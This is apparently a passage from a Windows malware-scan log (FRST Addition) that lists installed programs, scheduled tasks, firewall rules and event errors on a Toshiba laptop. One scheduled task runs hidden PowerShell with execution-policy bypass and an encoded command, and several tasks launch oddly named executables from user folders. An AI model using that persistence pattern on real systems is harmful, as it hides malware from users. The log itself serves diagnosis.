Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D}
AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation)
ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.)
Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation)
ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby)
DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.)
DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden
Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version:  - )
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version:  - Lexmark International, Inc.)
Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version:  - )
LightScribe  1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation)
QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.)
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.)
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH)
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation)
Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated)
TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation)
Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA)
TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version:  - )
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation)
TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version:  - )
Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation)
Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.)
Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation)
TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version:  - Agere Systems)
TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version:  - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent)
Windows Driver Package - TOSHIBA (FwLnk) System  (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION
Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION
Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.)
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION
Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] ()
Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION
Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION
Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe
Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION
Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION
Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll
2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll
2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll
2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll
2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll
2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx
2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1    mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe
FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe
FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe
FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80
FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80
FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80
FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869
FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900
FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

09-09-2015 11:00:57 Windows Update
10-09-2015 18:07:18 Windows Update
15-09-2015 07:55:18 Windows Update
18-09-2015 17:16:42 Windows Update
22-09-2015 14:11:34 Windows Update
26-09-2015 09:52:55 Windows Update
30-09-2015 10:34:26 Windows Update
03-10-2015 14:53:55 Windows Update
07-10-2015 17:52:14 Windows Update
11-10-2015 19:12:09 Windows Update
14-10-2015 19:51:23 Windows Update
15-10-2015 09:28:46 Windows Update
19-10-2015 11:40:48 Windows Update
22-10-2015 17:02:18 Windows Update
29-10-2015 19:01:20 Windows Update
03-11-2015 10:52:06 Windows Update
08-11-2015 11:52:57 Windows Update
12-11-2015 20:50:58 Windows Update
12-11-2015 21:46:25 Windows Update
16-11-2015 15:08:37 Windows Update
20-11-2015 19:26:46 Windows Update
27-11-2015 19:04:56 Windows Update
01-12-2015 12:15:00 Windows Update
04-12-2015 15:03:04 Windows Update
11-12-2015 12:52:52 Windows Update
14-12-2015 12:24:39 Windows Update
17-12-2015 18:42:37 Windows Update
26-12-2015 11:41:26 Windows Update
29-12-2015 21:04:35 Windows Update
03-01-2016 21:07:54 Windows Update
08-01-2016 18:16:31 Windows Update
16-01-2016 08:03:26 Windows Update
17-01-2016 11:42:08 Windows Update
21-01-2016 12:58:31 Windows Update
23-01-2016 18:29:26 Removed Ask Toolbar.
23-01-2016 18:35:35 Removed SlimCleaner Plus
29-01-2016 17:25:50 Removed Bing Bar
29-01-2016 17:45:18 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/30/2016 12:16:33 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/29/2016 05:31:49 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/29/2016 05:28:52 PM) (Source: EventSystem) (EventID: 4621) (User: )
Description: 80070005EventSystem.EventSubscription{60E12429-8258-44D3-B6B8-1E56EC5E24C3}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (01/29/2016 05:11:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/27/2016 03:17:02 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/27/2016 03:06:33 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/26/2016 03:26:31 AM) (Source: EventSystem) (EventID: 4621) (User: )
